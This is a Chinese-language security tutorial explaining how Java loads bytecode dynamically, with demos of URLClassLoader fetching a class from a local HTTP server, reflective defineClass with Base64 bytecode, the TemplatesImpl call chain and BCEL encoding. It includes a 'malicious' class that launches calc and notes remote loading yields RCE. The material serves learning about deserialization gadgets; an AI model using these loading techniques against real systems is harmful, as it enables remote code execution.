Java动态加载字节码

Java是一门编译型语言，经过编译器编译成字节码文件（.class），然后便可以运行在不同平台上的JVM虚拟机中。严格来说，Java 字节码（ByteCode）其实仅仅指的是 Java 虚拟机执行使用的一类指令，通常被存储在 .class 文件中。

双亲委派模型

双亲委派模型是 Java 类加载器 (ClassLoader)的一种工作机制，当一个类加载器收到加载类的请求时，它不会自己马上去加载，而是首先把这个请求委派给它的父类加载器去完成。只有当父类加载器无法加载（即在它的搜索路径下找不到）时，子类加载器才会尝试自己去加载。

这样设计的好处：避免重复加载，确保每个类在JVM中只被加载一次；防止恶意代码替换核心JAVA API，核心 API 总是由更高级别（更受信任）的类加载器加载。

先向上委派，再向下尝试。

1. 利用URLClassLoader加载远程class文件

Java的ClassLoader用于加载字节码文件，Java默认的ClassLoader根据类名来加载类，这个类名是类完整路径。URLClassLoader 是 Java 中一个非常实用的工具，它使得从文件系统、JAR 文件甚至远程 URL 动态加载类成为可能。它在其自身的 URL 路径中按顺序查找 .class 文件，从而实现了灵活的类加载功能。

Java根据配置项sun.boot.class.path和java.class.path中列举到的基础路径（这些路径是经过处理后的java.net.URL类）来寻找.class文件来加载，而这个基础路径有分为三种情况：（新建一个TestCalc.java文件，命令javac TestCalc.java编译成.class文件，将TestCalc.class文件移动到D:/vul/example目录下）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


package vul.example;  
import java.io.IOException;  
  
  
public class TestCalc {  
    static {  
        try {  
            Runtime.getRuntime().exec("calc");  
        } catch (IOException e){  
            e.printStackTrace();  
        }  
    }  
}

URL未以斜杠 / 结尾，则认为是一个JAR文件，使用JarLoader来寻找类，在Jar包中寻找.class文件
URL以斜杠 / 结尾，且协议名是file，则使用FileLoader来寻找类，在本地文件系统中寻找.class文件

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


package org.example;  
  
import java.net.URL;  
import java.net.URLClassLoader;  
  
public class FileCalc {  
    public static void main(String[] args) throws Exception {  
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///D:\\")});  
        Class calc = urlClassLoader.loadClass("vul.example.TestCalc");  
        calc.newInstance();  
    }  
}

URL以斜杠 / 结尾，且协议名不是file，则使用最基础的Loader来寻找类。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


package org.example;  
  
import java.net.URL;  
import java.net.URLClassLoader;  
  
public class HttpCalc {  
    public static void main(String[] args) throws Exception{  
        URL[] urls = {new URL("http://127.0.0.1:2233/")};  
        URLClassLoader loader = URLClassLoader.newInstance(urls);  
        Class c = loader.loadClass("vul.example.TestCalc");  
        c.newInstance();  
    }  
}

协议不是file且以 / 结尾，会使用Loader寻找类，最常见的是http协议。可以通过这种方法直接加载远端的class文件，所以如果我们控制了目标Java ClassLoader的基础路径为一个http服务器，即可RCE。

2. 利用ClassLoader#defineClass直接加载字节码

无论是加载远程class文件，还是本地的class或jar文件，java都是通过以下方法进行：

1
2
3
4
5


ClassLoader#loadClass
|
ClassLoader#findClass
|
ClassLoader#defineClass

loadClass：首先检查请求的类是否已经被加载在JVM的类缓存中，如果类未被加载，它会调用其父类加载器的 loadClass 方法来尝试加载。这个过程会递归向上，直到启动类加载器。如果父类加载器无法加载该类，当前 ClassLoader 的 findClass方法才会被调用。
findClass：查找并加载类的字节码文件。具体实现如 URLClassLoader、AppClassLoader 等会在这里根据其配置的路径（如本地文件系统、JAR 包、远程 URL）去定位 .class 文件。找到字节码后，它会将字节码读入字节数组。
defineClass：将字节码（以字节数组形式）转换成 JVM 内部的 Class 对象，处理成真正的Java类。这是一个受保护的方法。

demo： base64部分是编译后Hello.class的内容，原始Hello.java就是打印Hello World。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


package org.example;  
  
import java.lang.reflect.Method;  
import java.util.Base64;  
  
public class HelloDefineClass {  
    public static void main(String[] args) throws Exception {  
        Method defineClass= ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);  
        defineClass.setAccessible(true);  
        byte[] code= Base64.getDecoder().decode("yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM");  
        Class hello= (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);  
        hello.newInstance();  
    }  
}

解码 Base64 字符串得到 Hello.class 的字节码，通过反射调用系统类加载器的 defineClass 方法，将这个 Hello.class 加载到 JVM，通过反射调用 Hello 类的无参构造函数，创建 Hello 对象。

在实际场景中，因为defineClass方法作用域是不开放的，所以攻击者很少能直接利用到它，不过它是常用攻击链TemplatesImpl的基础。

3. 利用TemplatesImpl加载字节码

看到在TemplatesImpl类中还有一个内部类TransletClassLoader，这个类是继承ClassLoader，并且重写了defineClass方法。这里的defineClass由其父类的 protected 类型变成了一个 default 类型的方法，可以被类外部调用。

向前追溯调用链：

1
2
3
4


TemplatesImpl#getOutputProperties() -> 
TemplatesImpl#newTransformer() -> 
TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> 
TransletClassLoader#defineClass()

追到最前面两个方法TemplatesImpl#getOutputProperties()和TemplatesImpl#newTransformer()，这两者的作用域是public，可以被外部调用。

TemplatesImpl中对加载的字节码是有一定要求的：这个字节码对应的类必须是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet的子类。编写一个要调用的类HelloTemplatesImpl。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


package org.example;  

import com.sun.org.apache.xalan.internal.xsltc.DOM;  
import com.sun.org.apache.xalan.internal.xsltc.TransletException;  
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;  
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;  
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;  
public class HelloTemplatesImpl extends AbstractTranslet {  
    public void transform(DOM document, SerializationHandler[] handlers)  
            throws TransletException {}  
    public void transform(DOM document, DTMAxisIterator iterator,  
                          SerializationHandler handler) throws TransletException {}  
    public HelloTemplatesImpl() {  
        super();  
        System.out.println("Hello TemplatesImpl");  
    }  
}

简单POC： base64部分就是对HelloTemplatesImpl.class进行base64

这里定义了setFieldValue方法，用来设置私有属性。设置了三个属性：_bytecodes、_name和_tfactory。_bytecodes是由字节码组成的数组；_name可以是任意字符串，只要不为null即可；_tfactory需要是一个TransformerFactoryImpl对象，因为 TemplatesImpl#defineTransletClasses()方法里有调用到 _tfactory.getExternalExtensionsMap()，如果是null会出错。

4. 利用BCEL ClassLoader加载字节码

Apache Commons BCEL，属于Apache Commons项目下的一个子项目，但其因为被 Apache Xalan 所使用，而 Apache Xalan 又是 Java 内部对于 JAXP 的实现，所以 BCEL 也被包含在了 JDK 的原生库中。

BCEL提供了一个方便的API，可以进行分析、创建和操作Java Class文件。当你的 Java 源代码 (.java 文件) 被编译后，它会变成字节码 (.class 文件)，这些字节码是 JVM（Java 虚拟机）能够理解和执行的指令。BCEL 允许你直接与这些字节码进行交互，而无需从头编写或修改 Java 源代码。BCEL 将 Class 文件中所有的符号信息，如方法、字段和字节码指令等，都表示为对象。

BCEL 提供两个类Repository和Utility：

Repository用于将一个Java Class 先转换成原生字节码，当然这里也可以直接使用javac命令来编译 java 文件生成字节码。
Utility用于将原生的字节码转换成BCEL格式的字节码。

示例demo：首先创建恶意类TestCalc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


package vul;  
import java.io.IOException;  
  
  
public class TestCalc {  
    static {  
        try {  
            Runtime.getRuntime().exec("calc");  
        } catch (IOException e){  
            e.printStackTrace();  
        }  
    }  
}

encode：将class文件转换成BCEL格式的字节码注意导入的是com.sun.org.apache.bcel.internal.util.ClassLoader

decode：BCEL ClassLoader 正是用于加载这串特殊的“字节码”。在前面加上 $$BCEL$$是因为，BCEL 这个包中的类com.sun.org.apache.bcel.internal.util.ClassLoader重写了 Java 内置的ClassLoader#loadClass()方法。在 ClassLoader#loadClass() 中，其会判断类名是否是 $$BCEL$$开头，如果是的话，将会对这个字符串进行 decode。

参考：

phith0n-java代码审计
https://www.freebuf.com/articles/web/335297.html
https://www.cnblogs.com/1vxyz/p/17245206.html